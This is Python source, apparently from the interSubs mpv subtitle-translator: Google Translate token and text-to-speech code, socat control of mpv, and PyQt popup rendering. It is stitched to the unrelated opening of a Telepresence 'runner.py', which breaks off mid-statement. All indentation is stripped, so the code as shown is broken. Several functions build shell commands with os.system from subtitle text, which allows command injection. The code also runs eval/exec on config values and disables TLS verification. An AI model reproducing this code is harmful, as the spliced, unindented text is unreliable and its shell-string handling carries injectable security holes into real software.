# This will probably only occur when d is actually a str containing UTF-8 chars, which means we don't need
# to encode.
d = bytearray(text)
a = int(first_seed)
for value in d:
a += value
a = self._work_token(a, self.SALT_1)
a = self._work_token(a, self.SALT_2)
a ^= int(second_seed)
if 0 > a:
a = (a & 2147483647) + 2147483648
a %= 1E6
a = int(a)
return str(a) + "." + str(a ^ int(first_seed))
def _get_token_key(self):
if self.token_key is not None:
return self.token_key
response = requests.get("https://translate.google.com/")
tkk_expr = re.search("(tkk:.*?),", response.text)
if not tkk_expr:
raise ValueError(
"Unable to find token seed! Did https://translate.google.com change?"
)
tkk_expr = tkk_expr.group(1)
try:
# Grab the token directly if already generated by function call
result = re.search("\d{6}\.[0-9]+", tkk_expr).group(0)
except AttributeError:
# Generate the token using algorithm
timestamp = calendar.timegm(time.gmtime())
hours = int(math.floor(timestamp / 3600))
a = re.search("a\\\\x3d(-?\d+);", tkk_expr).group(1)
b = re.search("b\\\\x3d(-?\d+);", tkk_expr).group(1)
result = str(hours) + "." + str(int(a) + int(b))
self.token_key = result
return result
""" Functions used by the token calculation algorithm """
def _rshift(self, val, n):
return val >> n if val >= 0 else (val + 0x100000000) >> n
def _work_token(self, a, seed):
for i in range(0, len(seed) - 2, 3):
char = seed[i + 2]
d = ord(char[0]) - 87 if char >= "a" else int(char)
d = self._rshift(a, d) if seed[i + 1] == "+" else a << d
a = a + d & 4294967295 if seed[i] == "+" else a ^ d
return a
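# Usage sketch (hedged): the token depends on the hourly seed fetched from
# translate.google.com, so the exact value varies:
#
#   tk = Token().calculate_token('hello')   # returns a 'NNNNNN.NNNNNN'-style string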
# https://github.com/pndurette/gTTS
class gTTS:
""" gTTS (Google Text to Speech): an interface to Google's Text to Speech API """
# Google TTS API supports two read speeds
# (speed <= 0.3: slow; speed > 0.3: normal; default: 1)
class Speed:
SLOW = 0.3
NORMAL = 1
GOOGLE_TTS_URL = 'https://translate.google.com/translate_tts'
MAX_CHARS = 100 # Max characters the Google TTS API takes at a time
LANGUAGES = {
'af' : 'Afrikaans',
'sq' : 'Albanian',
'ar' : 'Arabic',
'hy' : 'Armenian',
'bn' : 'Bengali',
'ca' : 'Catalan',
'zh' : 'Chinese',
'zh-cn' : 'Chinese (Mandarin/China)',
'zh-tw' : 'Chinese (Mandarin/Taiwan)',
'zh-yue' : 'Chinese (Cantonese)',
'hr' : 'Croatian',
'cs' : 'Czech',
'da' : 'Danish',
'nl' : 'Dutch',
'en' : 'English',
'en-au' : 'English (Australia)',
'en-uk' : 'English (United Kingdom)',
'en-us' : 'English (United States)',
'eo' : 'Esperanto',
'fi' : 'Finnish',
'fr' : 'French',
'de' : 'German',
'el' : 'Greek',
'hi' : 'Hindi',
'hu' : 'Hungarian',
'is' : 'Icelandic',
'id' : 'Indonesian',
'it' : 'Italian',
'iw' : 'Hebrew',
'ja' : 'Japanese',
'km' : 'Khmer (Cambodian)',
'ko' : 'Korean',
'la' : 'Latin',
'lv' : 'Latvian',
'mk' : 'Macedonian',
'no' : 'Norwegian',
'pl' : 'Polish',
'pt' : 'Portuguese',
'ro' : 'Romanian',
'ru' : 'Russian',
'sr' : 'Serbian',
'si' : 'Sinhala',
'sk' : 'Slovak',
'es' : 'Spanish',
'es-es' : 'Spanish (Spain)',
'es-us' : 'Spanish (United States)',
'sw' : 'Swahili',
'sv' : 'Swedish',
'ta' : 'Tamil',
'th' : 'Thai',
'tr' : 'Turkish',
'uk' : 'Ukrainian',
'vi' : 'Vietnamese',
'cy' : 'Welsh'
}
def __init__(self, text, lang = 'en', slow = False, debug = False):
self.debug = debug
if lang.lower() not in self.LANGUAGES:
raise Exception('Language not supported: %s' % lang)
else:
self.lang = lang.lower()
if not text:
raise Exception('No text to speak')
else:
self.text = text
# Read speed
if slow:
self.speed = self.Speed().SLOW
else:
self.speed = self.Speed().NORMAL
# Split text in parts
if self._len(text) <= self.MAX_CHARS:
text_parts = [text]
else:
text_parts = self._tokenize(text, self.MAX_CHARS)
# Clean
def strip(x): return x.replace('\n', '').strip()
text_parts = [strip(x) for x in text_parts]
text_parts = [x for x in text_parts if len(x) > 0]
self.text_parts = text_parts
# Google Translate token
self.token = Token()
def save(self, savefile):
""" Do the Web request and save to `savefile` """
with open(savefile, 'wb') as f:
self.write_to_fp(f)
def write_to_fp(self, fp):
""" Do the Web request and save to a file-like object """
for idx, part in enumerate(self.text_parts):
payload = { 'ie' : 'UTF-8',
'q' : part,
'tl' : self.lang,
'ttsspeed' : self.speed,
'total' : len(self.text_parts),
'idx' : idx,
'client' : 'tw-ob',
'textlen' : self._len(part),
'tk' : self.token.calculate_token(part)}
headers = {
"Referer" : "http://translate.google.com/",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36"
}
if self.debug: print(payload)
try:
				# Disable requests' ssl verify to accommodate certain proxies and firewalls
# Filter out urllib3's insecure warnings. We can live without ssl verify here
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=requests.packages.urllib3.exceptions.InsecureRequestWarning)
r = requests.get(self.GOOGLE_TTS_URL,
params=payload,
headers=headers,
proxies=urllib.request.getproxies(),
verify=False)
if self.debug:
print("Headers: {}".format(r.request.headers))
print("Request url: {}".format(r.request.url))
print("Response: {}, Redirects: {}".format(r.status_code, r.history))
r.raise_for_status()
for chunk in r.iter_content(chunk_size=1024):
fp.write(chunk)
except Exception as e:
raise
def _len(self, text):
""" Get char len of `text`, after decoding if Python 2 """
try:
# Python 2
return len(text.decode('utf8'))
except AttributeError:
# Python 3
return len(text)
def _tokenize(self, text, max_size):
""" Tokenizer on basic roman punctuation """
punc = "¡!()[]¿?.,;:—«»\n"
punc_list = [re.escape(c) for c in punc]
pattern = '|'.join(punc_list)
parts = re.split(pattern, text)
min_parts = []
for p in parts:
min_parts += self._minimize(p, " ", max_size)
return min_parts
def _minimize(self, thestring, delim, max_size):
""" Recursive function that splits `thestring` in chunks
of maximum `max_size` chars delimited by `delim`. Returns list. """
if self._len(thestring) > max_size:
idx = thestring.rfind(delim, 0, max_size)
return [thestring[:idx]] + self._minimize(thestring[idx:], delim, max_size)
else:
return [thestring]
def mpv_pause():
os.system('echo \'{ "command": ["set_property", "pause", true] }\' | socat - "' + mpv_socket + '" > /dev/null')
def mpv_resume():
os.system('echo \'{ "command": ["set_property", "pause", false] }\' | socat - "' + mpv_socket + '" > /dev/null')
def mpv_pause_status():
stdoutdata = subprocess.getoutput('echo \'{ "command": ["get_property", "pause"] }\' | socat - "' + mpv_socket + '"')
try:
return loads(stdoutdata)['data']
except:
return mpv_pause_status()
def mpv_fullscreen_status():
stdoutdata = subprocess.getoutput('echo \'{ "command": ["get_property", "fullscreen"] }\' | socat - "' + mpv_socket + '"')
try:
return loads(stdoutdata)['data']
except:
return mpv_fullscreen_status()
def mpv_message(message, timeout = 3000):
os.system('echo \'{ "command": ["show-text", "' + message + '", "' + str(timeout) + '"] }\' | socat - "' + mpv_socket + '" > /dev/null')
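# These helpers drive mpv over its JSON IPC socket via socat; mpv therefore has
# to be started with something like `mpv --input-ipc-server=<socket path> ...`
# (the mpv_socket path itself is set elsewhere in this script).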
def stripsd2(phrase):
return ''.join(e for e in phrase.strip().lower() if e == ' ' or (e.isalnum() and not e.isdigit())).strip()
def r2l(l):
l2 = ''
try:
l2 = re.findall('(?!%)\W+$', l)[0][::-1]
except:
pass
l2 += re.sub('^\W+|(?!%)\W+$', '', l)
try:
l2 += re.findall('^\W+', l)[0][::-1]
except:
pass
return l2
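# e.g. r2l('שלום!') == '!שלום' -- leading/trailing punctuation is mirrored so that
# right-to-left text renders with punctuation on the visually correct side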
def split_long_lines(line, chunks = 2, max_symbols_per_line = False):
if max_symbols_per_line:
chunks = 0
while 1:
chunks += 1
new_lines = []
for i in range(chunks):
new_line = ' '.join(numpy.array_split(line.split(' '), chunks)[i])
new_lines.append(new_line)
if len(max(new_lines, key = len)) <= max_symbols_per_line:
return '\n'.join(new_lines)
else:
new_lines = []
for i in range(chunks):
new_line = ' '.join(numpy.array_split(line.split(' '), chunks)[i])
new_lines.append(new_line)
return '\n'.join(new_lines)
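# e.g. split_long_lines('one two three four', chunks = 2) == 'one two\nthree four';
# when max_symbols_per_line is set, chunks is increased until every line fits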
def dir2(name):
print('\n'.join(dir( name )))
exit()
class thread_subtitles(QObject):
update_subtitles = pyqtSignal(bool, bool)
@pyqtSlot()
def main(self):
global subs
was_hidden = 0
inc = 0
auto_pause_2_ind = 0
last_updated = time.time()
while 1:
time.sleep(config.update_time)
# hide subs when mpv isn't in focus or in fullscreen
if inc * config.update_time > config.focus_checking_time - 0.0001:
while 'mpv' not in subprocess.getoutput('xdotool getwindowfocus getwindowname') or (config.hide_when_not_fullscreen_B and not mpv_fullscreen_status()) or (os.path.exists(mpv_socket + '_hide')):
if not was_hidden:
self.update_subtitles.emit(True, False)
was_hidden = 1
else:
time.sleep(config.focus_checking_time)
inc = 0
inc += 1
if was_hidden:
was_hidden = 0
self.update_subtitles.emit(False, False)
continue
try:
tmp_file_subs = open(sub_file).read()
except:
continue
# tmp hack
# if config.R2L_from_B:
# tmp_file_subs = r2l(tmp_file_subs.strip())
if config.extend_subs_duration2max_B and not len(tmp_file_subs):
if not config.extend_subs_duration_limit_sec:
continue
if config.extend_subs_duration_limit_sec > time.time() - last_updated:
continue
last_updated = time.time()
# automatically switch into Hebrew if it's detected
if config.lang_from != 'he' and config.lang_from != 'iw' and any((c in set('קראטוןםפשדגכעיחלךףזסבהנמצתץ')) for c in tmp_file_subs):
config.lang_from = 'he'
frf = random.choice(config.he_fonts)
config.style_subs = re.sub('font-family: ".*?";', lambda ff: 'font-family: "%s";' % frf, config.style_subs, flags = re.I)
config.R2L_from_B = True
config.translation_function_names = config.translation_function_names_2
config.listen_via = 'forvo'
os.system('notify-send -i none -t 1111 "He"')
os.system('notify-send -i none -t 1111 "%s"' % str(frf))
self.update_subtitles.emit(False, True)
while tmp_file_subs != subs:
if config.auto_pause == 2:
if not auto_pause_2_ind and len(re.sub(' +', ' ', stripsd2(subs.replace('\n', ' '))).split(' ')) > config.auto_pause_min_words - 1 and not mpv_pause_status():
mpv_pause()
auto_pause_2_ind = 1
if auto_pause_2_ind and mpv_pause_status():
break
auto_pause_2_ind = 0
subs = tmp_file_subs
if config.auto_pause == 1:
if len(re.sub(' +', ' ', stripsd2(subs.replace('\n', ' '))).split(' ')) > config.auto_pause_min_words - 1:
mpv_pause()
self.update_subtitles.emit(False, False)
break
class thread_translations(QObject):
get_translations = pyqtSignal(str, int, bool)
@pyqtSlot()
def main(self):
while 1:
to_new_word = False
try:
word, globalX = config.queue_to_translate.get(False)
except:
time.sleep(config.update_time)
continue
# changing cursor to hourglass during translation
QApplication.setOverrideCursor(Qt.WaitCursor)
threads = []
for translation_function_name in config.translation_function_names:
threads.append(threading.Thread(target = globals()[translation_function_name], args = (word,)))
for x in threads:
x.start()
while any(thread.is_alive() for thread in threads):
if config.queue_to_translate.qsize():
to_new_word = True
break
time.sleep(config.update_time)
QApplication.restoreOverrideCursor()
if to_new_word:
continue
if config.block_popup:
continue
self.get_translations.emit(word, globalX, False)
# drawing layer
# because the text outline can't be calculated with precision
class drawing_layer(QLabel):
def __init__(self, line, subs, parent=None):
super().__init__(None)
self.line = line
self.setStyleSheet(config.style_subs)
self.psuedo_line = 0
def draw_text_n_outline(self, painter: QPainter, x, y, outline_width, outline_blur, text):
outline_color = QColor(config.outline_color)
font = self.font()
text_path = QPainterPath()
if config.R2L_from_B:
text_path.addText(x, y, font, ' ' + r2l(text.strip()) + ' ')
else:
text_path.addText(x, y, font, text)
# draw blur
range_width = range(outline_width, outline_width + outline_blur)
# ~range_width = range(outline_width + outline_blur, outline_width, -1)
for width in range_width:
if width == min(range_width):
alpha = 200
else:
alpha = (max(range_width) - width) / max(range_width) * 200
alpha = int(alpha)
blur_color = QColor(outline_color.red(), outline_color.green(), outline_color.blue(), alpha)
blur_brush = QBrush(blur_color, Qt.SolidPattern)
blur_pen = QPen(blur_brush, width, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin)
painter.setPen(blur_pen)
painter.drawPath(text_path)
# draw outline
outline_color = QColor(outline_color.red(), outline_color.green(), outline_color.blue(), 255)
outline_brush = QBrush(outline_color, Qt.SolidPattern)
outline_pen = QPen(outline_brush, outline_width, Qt.SolidLine, Qt.RoundCap, Qt.RoundJoin)
painter.setPen(outline_pen)
painter.drawPath(text_path)
# draw text
color = self.palette().color(QPalette.Text)
painter.setPen(color)
painter.drawText(x, y, text)
if config.outline_B:
def paintEvent(self, evt: QPaintEvent):
if not self.psuedo_line:
self.psuedo_line = 1
return
x = y = 0
y += self.fontMetrics().ascent()
painter = QPainter(self)
self.draw_text_n_outline(
painter,
x,
y + config.outline_top_padding - config.outline_bottom_padding,
config.outline_thickness,
config.outline_blur,
text = self.line
)
def resizeEvent(self, *args):
self.setFixedSize(
self.fontMetrics().width(self.line),
self.fontMetrics().height() +
config.outline_bottom_padding +
config.outline_top_padding
)
def sizeHint(self):
return QSize(
self.fontMetrics().width(self.line),
self.fontMetrics().height()
)
class events_class(QLabel):
mouseHover = pyqtSignal(str, int, bool)
redraw = pyqtSignal(bool, bool)
def __init__(self, word, subs, skip = False, parent=None):
super().__init__(word)
self.setMouseTracking(True)
self.word = word
self.subs = subs
self.skip = skip
self.highlight = False
self.setStyleSheet('background: transparent; color: transparent;')
def highlighting(self, color, underline_width):
color = QColor(color)
color = QColor(color.red(), color.green(), color.blue(), 200)
painter = QPainter(self)
if config.hover_underline:
font_metrics = QFontMetrics(self.font())
text_width = font_metrics.width(self.word)
text_height = font_metrics.height()
brush = QBrush(color)
pen = QPen(brush, underline_width, Qt.SolidLine, Qt.RoundCap)
painter.setPen(pen)
if not self.skip:
painter.drawLine(0, text_height - underline_width, text_width, text_height - underline_width)
if config.hover_hightlight:
x = y = 0
y += self.fontMetrics().ascent()
painter.setPen(color)
painter.drawText(x, y + config.outline_top_padding - config.outline_bottom_padding, self.word)
if config.outline_B:
def paintEvent(self, evt: QPaintEvent):
if self.highlight:
self.highlighting(config.hover_color, config.hover_underline_thickness)
#####################################################
def resizeEvent(self, event):
text_height = self.fontMetrics().height()
text_width = self.fontMetrics().width(self.word)
self.setFixedSize(text_width, text_height + config.outline_bottom_padding + config.outline_top_padding)
def enterEvent(self, event):
if not self.skip:
self.highlight = True
self.repaint()
config.queue_to_translate.put((self.word, event.globalX()))
@pyqtSlot()
def leaveEvent(self, event):
if not self.skip:
self.highlight = False
self.repaint()
config.scroll = {}
self.mouseHover.emit('', 0, False)
QApplication.restoreOverrideCursor()
def wheel_scrolling(self, event):
if event.y() > 0:
return 'ScrollUp'
if event.y():
return 'ScrollDown'
if event.x() > 0:
return 'ScrollLeft'
if event.x():
return 'ScrollRight'
def wheelEvent(self, event):
for mouse_action in config.mouse_buttons:
if self.wheel_scrolling(event.angleDelta()) == mouse_action[0]:
if event.modifiers() == eval('Qt.%s' % mouse_action[1]):
exec('self.%s(event)' % mouse_action[2])
def mousePressEvent(self, event):
for mouse_action in config.mouse_buttons:
if 'Scroll' not in mouse_action[0]:
if event.button() == eval('Qt.%s' % mouse_action[0]):
if event.modifiers() == eval('Qt.%s' % mouse_action[1]):
exec('self.%s(event)' % mouse_action[2])
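# Illustrative shape of config.mouse_buttons (an assumption inferred from the
# string comparison and the eval/exec lookups above, not the project's actual
# defaults); each entry is [button or scroll direction, Qt modifier name,
# handler method name on this class]:
#
#   config.mouse_buttons = [
#       ['ScrollUp',     'NoModifier',      'f_scroll_translations_up'],
#       ['ScrollDown',   'NoModifier',      'f_scroll_translations_down'],
#       ['LeftButton',   'NoModifier',      'f_listen'],
#       ['MiddleButton', 'ControlModifier', 'f_save_word_to_file'],
#   ]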
#####################################################
def f_show_in_browser(self, event):
config.avoid_resuming = True
os.system(config.show_in_browser.replace('${word}', self.word))
def f_auto_pause_options(self, event):
if config.auto_pause == 2:
config.auto_pause = 0
else:
config.auto_pause += 1
mpv_message('auto_pause: %d' % config.auto_pause)
def f_listen(self, event):
listen(self.word, config.listen_via)
@pyqtSlot()
def f_subs_screen_edge_padding_decrease(self, event):
config.subs_screen_edge_padding -= 5
mpv_message('subs_screen_edge_padding: %d' % config.subs_screen_edge_padding)
self.redraw.emit(False, True)
@pyqtSlot()
def f_subs_screen_edge_padding_increase(self, event):
config.subs_screen_edge_padding += 5
mpv_message('subs_screen_edge_padding: %d' % config.subs_screen_edge_padding)
self.redraw.emit(False, True)
@pyqtSlot()
def f_font_size_decrease(self, event):
config.style_subs = re.sub(r'font-size: (\d+)px;', lambda size: [ 'font-size: %dpx;' % ( int(size.group(1)) - 1 ), mpv_message('font: %s' % size.group(1)) ][0], config.style_subs, flags = re.I)
self.redraw.emit(False, True)
@pyqtSlot()
def f_font_size_increase(self, event):
config.style_subs = re.sub(r'font-size: (\d+)px;', lambda size: [ 'font-size: %dpx;' % ( int(size.group(1)) + 1 ), mpv_message('font: %s' % size.group(1)) ][0], config.style_subs, flags = re.I)
self.redraw.emit(False, True)
def f_auto_pause_min_words_decrease(self, event):
config.auto_pause_min_words -= 1
mpv_message('auto_pause_min_words: %d' % config.auto_pause_min_words)
def f_auto_pause_min_words_increase(self, event):
config.auto_pause_min_words += 1
mpv_message('auto_pause_min_words: %d' % config.auto_pause_min_words)
# f_deepl_translation -> f_translation_full_sentence
@pyqtSlot()
def f_deepl_translation(self, event):
self.mouseHover.emit(self.subs , event.globalX(), True)
@pyqtSlot()
def f_translation_full_sentence(self, event):
self.mouseHover.emit(self.subs , event.globalX(), True)
def f_save_word_to_file(self, event):
if ( os.path.isfile(os.path.expanduser(config.save_word_to_file_fname)) and self.word not in [ x.strip() for x in open(os.path.expanduser(config.save_word_to_file_fname)).readlines() ] ) or not os.path.isfile(os.path.expanduser(config.save_word_to_file_fname)):
print(self.word, file = open(os.path.expanduser(config.save_word_to_file_fname), 'a'))
@pyqtSlot()
def f_scroll_translations_up(self, event):
if self.word in config.scroll and config.scroll[self.word] > 0:
config.scroll[self.word] = config.scroll[self.word] - 1
else:
config.scroll[self.word] = 0
self.mouseHover.emit(self.word, event.globalX(), False)
@pyqtSlot()
def f_scroll_translations_down(self, event):
if self.word in config.scroll:
config.scroll[self.word] = config.scroll[self.word] + 1
else:
config.scroll[self.word] = 1
self.mouseHover.emit(self.word, event.globalX(), False)
class main_class(QWidget):
def __init__(self):
super().__init__()
self.thread_subs = QThread()
self.obj = thread_subtitles()
self.obj.update_subtitles.connect(self.render_subtitles)
self.obj.moveToThread(self.thread_subs)
self.thread_subs.started.connect(self.obj.main)
self.thread_subs.start()
self.thread_translations = QThread()
self.obj2 = thread_translations()
self.obj2.get_translations.connect(self.render_popup)
self.obj2.moveToThread(self.thread_translations)
self.thread_translations.started.connect(self.obj2.main)
self.thread_translations.start()
# start the forms
self.subtitles_base()
self.subtitles_base2()
self.popup_base()
def clearLayout(self, layout):
if layout == 'subs':
layout = self.subtitles_vbox
self.subtitles.hide()
elif layout == 'subs2':
layout = self.subtitles_vbox2
self.subtitles2.hide()
elif layout == 'popup':
layout = self.popup_vbox
self.popup.hide()
if layout is not None:
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
else:
self.clearLayout(item.layout())
def subtitles_base(self):
self.subtitles = QFrame()
self.subtitles.setAttribute(Qt.WA_TranslucentBackground)
self.subtitles.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.subtitles.setStyleSheet(config.style_subs)
self.subtitles_vbox = QVBoxLayout(self.subtitles)
self.subtitles_vbox.setSpacing(config.subs_padding_between_lines)
self.subtitles_vbox.setContentsMargins(0, 0, 0, 0)
def subtitles_base2(self):
self.subtitles2 = QFrame()
self.subtitles2.setAttribute(Qt.WA_TranslucentBackground)
self.subtitles2.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.subtitles2.setStyleSheet(config.style_subs)
self.subtitles_vbox2 = QVBoxLayout(self.subtitles2)
self.subtitles_vbox2.setSpacing(config.subs_padding_between_lines)
self.subtitles_vbox2.setContentsMargins(0, 0, 0, 0)
if config.pause_during_translation_B:
self.subtitles2.enterEvent = lambda event : [mpv_pause(), setattr(config, 'block_popup', False)][0]
self.subtitles2.leaveEvent = lambda event : [mpv_resume(), setattr(config, 'block_popup', True)][0] if not config.avoid_resuming else [setattr(config, 'avoid_resuming', False), setattr(config, 'block_popup', True)][0]
def popup_base(self):
self.popup = QFrame()
self.popup.setAttribute(Qt.WA_TranslucentBackground)
self.popup.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.popup.setStyleSheet(config.style_popup)
self.popup_inner = QFrame()
outer_box = QVBoxLayout(self.popup)
outer_box.addWidget(self.popup_inner)
self.popup_vbox = QVBoxLayout(self.popup_inner)
self.popup_vbox.setSpacing(0)
def render_subtitles(self, hide = False, redraw = False):
if hide or not len(subs):
try:
self.subtitles.hide()
self.subtitles2.hide()
finally:
return
if redraw:
self.subtitles.setStyleSheet(config.style_subs)
self.subtitles2.setStyleSheet(config.style_subs)
else:
self.clearLayout('subs')
self.clearLayout('subs2')
if hasattr(self, 'popup'):
self.popup.hide()
# if subtitle consists of one overly long line - split into two
if config.split_long_lines_B and len(subs.split('\n')) == 1 and len(subs.split(' ')) > config.split_long_lines_words_min - 1:
subs2 = split_long_lines(subs)
else:
subs2 = subs
subs2 = re.sub(' +', ' ', subs2).strip()
##############################
for line in subs2.split('\n'):
line2 = ' %s ' % line.strip()
ll = drawing_layer(line2, subs2)
hbox = QHBoxLayout()
hbox.setContentsMargins(0, 0, 0, 0)
hbox.setSpacing(0)
hbox.addStretch()
hbox.addWidget(ll)
hbox.addStretch()
self.subtitles_vbox.addLayout(hbox)
####################################
hbox = QHBoxLayout()
hbox.setContentsMargins(0, 0, 0, 0)
hbox.setSpacing(0)
hbox.addStretch()
if config.R2L_from_B:
line2 = line2[::-1]
line2 += '\00'
word = ''
for smbl in line2:
if smbl.isalpha():
word += smbl
else:
if len(word):
if config.R2L_from_B:
word = word[::-1]
ll = events_class(word, subs2)
ll.mouseHover.connect(self.render_popup)
ll.redraw.connect(self.render_subtitles)
hbox.addWidget(ll)
word = ''
if smbl != '\00':
ll = events_class(smbl, subs2, skip = True)
hbox.addWidget(ll)
hbox.addStretch()
self.subtitles_vbox2.addLayout(hbox)
self.subtitles.adjustSize()
self.subtitles2.adjustSize()
w = self.subtitles.geometry().width()
h = self.subtitles.height = self.subtitles.geometry().height()
x = (config.screen_width/2) - (w/2)
if config.subs_top_placement_B:
y = config.subs_screen_edge_padding
else:
y = config.screen_height - config.subs_screen_edge_padding - h
self.subtitles.setGeometry(int(x), int(y), 0, 0)
self.subtitles.show()
self.subtitles2.setGeometry(int(x), int(y), 0, 0)
self.subtitles2.show()
def render_popup(self, text, x_cursor_pos, is_line):
if text == '':
if hasattr(self, 'popup'):
self.popup.hide()
return
self.clearLayout('popup')
if is_line:
QApplication.setOverrideCursor(Qt.WaitCursor)
line = globals()[config.translation_function_name_full_sentence](text)
if config.translation_function_name_full_sentence == 'google':
try:
line = line[0][0][0].strip()
except:
line = 'Google translation failed.'
if config.split_long_lines_B and len(line.split('\n')) == 1 and len(line.split(' ')) > config.split_long_lines_words_min - 1:
line = split_long_lines(line)
ll = QLabel(line)
ll.setObjectName("first_line")
self.popup_vbox.addWidget(ll)
else:
word = text
for translation_function_name_i, translation_function_name in enumerate(config.translation_function_names):
pairs, word_descr = globals()[translation_function_name](word)
if not len(pairs):
pairs = [['', '[Not found]']]
#return
# ~pairs = [ [ str(i) + ' ' + pair[0], pair[1] ] for i, pair in enumerate(pairs) ]
if word in config.scroll:
if len(pairs[config.scroll[word]:]) > config.number_of_translations:
pairs = pairs[config.scroll[word]:]
else:
pairs = pairs[-config.number_of_translations:]
if len(config.translation_function_names) == 1:
config.scroll[word] -= 1
for i1, pair in enumerate(pairs):
if i1 == config.number_of_translations:
break
if config.split_long_lines_in_popup_B:
pair[0] = split_long_lines(pair[0], max_symbols_per_line = config.split_long_lines_in_popup_symbols_min)
pair[1] = split_long_lines(pair[1], max_symbols_per_line = config.split_long_lines_in_popup_symbols_min)
if pair[0] == '-':
pair[0] = ''
if pair[1] == '-':
pair[1] = ''
# ~if config.R2L_from_B:
# ~pair[0] = pair[0][::-1]
# ~if config.R2L_to_B:
# ~pair[1] = pair[1][::-1]
if pair[0] != '':
# to emphasize the exact form of the word
# to ignore case on input and match it on output
chnks = re.split(word, pair[0], flags = re.I)
exct_words = re.findall(word, pair[0], flags = re.I)
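# Illustrative example (not from the original file): with word = 'look' and
# pair[0] = 'Look up, look around', chnks == ['', ' up, ', ' around'] and
# exct_words == ['Look', 'look'], so the loop below re-inserts each matched
# form, styled as "first_line_emphasize_word", between the plain chunks.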
hbox = QHBoxLayout()
hbox.setContentsMargins(0, 0, 0, 0)
for i2, chnk in enumerate(chnks):
if len(chnk):
ll = QLabel(chnk)
ll.setObjectName("first_line")
hbox.addWidget(ll)
if i2 + 1 < len(chnks):
ll = QLabel(exct_words[i2])
ll.setObjectName("first_line_emphasize_word")
hbox.addWidget(ll)
# filling the rest of the line with empty bg
ll = QLabel()
ll.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
hbox.addWidget(ll)
self.popup_vbox.addLayout(hbox)
if pair[1] != '':
ll = QLabel(pair[1])
ll.setObjectName("second_line")
self.popup_vbox.addWidget(ll)
# padding
ll = QLabel()
ll.setStyleSheet("font-size: 6px;")
self.popup_vbox.addWidget(ll)
if len(word_descr[0]):
ll = QLabel(word_descr[0])
ll.setProperty("morphology", word_descr[1])
ll.setAlignment(Qt.AlignRight)
self.popup_vbox.addWidget(ll)
# delimiter between dictionaries
if translation_function_name_i + 1 < len(config.translation_function_names):
ll = QLabel()
ll.setObjectName("delimiter")
self.popup_vbox.addWidget(ll)
self.popup_inner.adjustSize()
self.popup.adjustSize()
w = self.popup.geometry().width()
h = self.popup.geometry().height()
if w > config.screen_width:
w = config.screen_width - 20
if not is_line:
if w < config.screen_width / 3:
w = config.screen_width / 3
if x_cursor_pos == -1:
x = (config.screen_width/2) - (w/2)
else:
x = x_cursor_pos - w/5
if x+w > config.screen_width:
x = config.screen_width - w
if config.subs_top_placement_B:
y = self.subtitles.height + config.subs_screen_edge_padding
else:
y = config.screen_height - config.subs_screen_edge_padding - self.subtitles.height - h
self.popup.setGeometry(int(x), int(y), int(w), 0)
self.popup.show()
QApplication.restoreOverrideCursor()
if __name__ == "__main__":
print('[py part] Starting interSubs ...')
try:
os.mkdir('urls')
except:
pass
if 'tab_divided_dict' in config.translation_function_names:
offdict = { x.split('\t')[0].strip().lower() : x.split('\t')[1].strip() for x in open(os.path.expanduser(config.tab_divided_dict_fname)).readlines() if '\t' in x }
mpv_socket = sys.argv[1]
sub_file = sys.argv[2]
# sub_file = '/tmp/mpv_sub_'
# mpv_socket = '/tmp/mpv_socket_'
subs = ''
app = QApplication(sys.argv)
config.avoid_resuming = False
config.block_popup = False
config.scroll = {}
config.queue_to_translate = queue.Queue()
config.screen_width = app.primaryScreen().size().width()
config.screen_height = app.primaryScreen().size().height()
form = main_class()
app.exec_()
|
runner.py
|
# Copyright 2018 Datawire. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import platform
import select
import signal
import socket
import sys
import textwrap
import typing
import uuid
from contextlib import contextmanager
from functools import partial
from inspect import currentframe, getframeinfo
from pathlib import Path
from shutil import rmtree, which
from subprocess import STDOUT, CalledProcessError, Popen, TimeoutExpired
from tempfile import mkdtemp
from threading import Thread
from time import sleep, time
from telepresence import TELEPRESENCE_BINARY
from telepresence.utilities import kill_process, str_command
from .cache import Cache
from .kube import KUBE_UNSET
from .launch import BackgroundProcessCrash, _launch_command, _Logger
from .output import Output
from .output_mask import mask_sensitive_data
from .span import Span
_CleanupItem = typing.NamedTuple(
"_CleanupItem", [
("name", str),
("callable", typing.Callable[..., None]),
("args", typing.Tuple[typing.Any, ...]),
("kwargs", typing.Dict[str, typing.Any]),
]
)
class Runner:
"""Context for running subprocesses."""
def __init__(self, logfile_path: str, verbose: bool) -> None:
"""
:param logfile_path: Path or string file path or "-" for stdout
:param verbose: Whether subcommand should run in verbose mode.
"""
self.output = Output(logfile_path)
self.logfile_path = self.output.logfile_path
self.kubectl = KUBE_UNSET
self.verbose = verbose
self.start_time = time()
self.current_span = None # type: typing.Optional[Span]
self.counter = 0
self.cleanup_stack = [] # type: typing.List[_CleanupItem]
self.sudo_held = False
self.sudo_for_docker = False
self.quitting = False
self.ended = [] # type: typing.List[str]
self.is_wsl = False
if sys.platform.startswith("linux"):
self.platform = "linux"
# Detect if this platform is really linux-on-windows
if platform.uname().release.endswith("-Microsoft"):
self.is_wsl = True
elif sys.platform.startswith("darwin"):
self.platform = "darwin"
else:
# For untested platforms...
self.platform = sys.platform
self.output.write("uname: {}".format(platform.uname()))
self.output.write("Platform: {}".format(self.platform))
self.output.write("WSL: {}".format(self.is_wsl))
term_width = 99999
self.chatty = False
if sys.stderr.isatty():
err_fd = sys.stderr.fileno()
try:
term_width = os.get_terminal_size(err_fd).columns - 1
self.chatty = True
except OSError:
pass
if term_width < 25:
term_width = 99999
self.wrapper = textwrap.TextWrapper(
width=term_width,
initial_indent="T: ",
subsequent_indent="T: ",
replace_whitespace=False,
drop_whitespace=False,
)
self.raw_wrapper = textwrap.TextWrapper(
width=99999,
initial_indent="T: ",
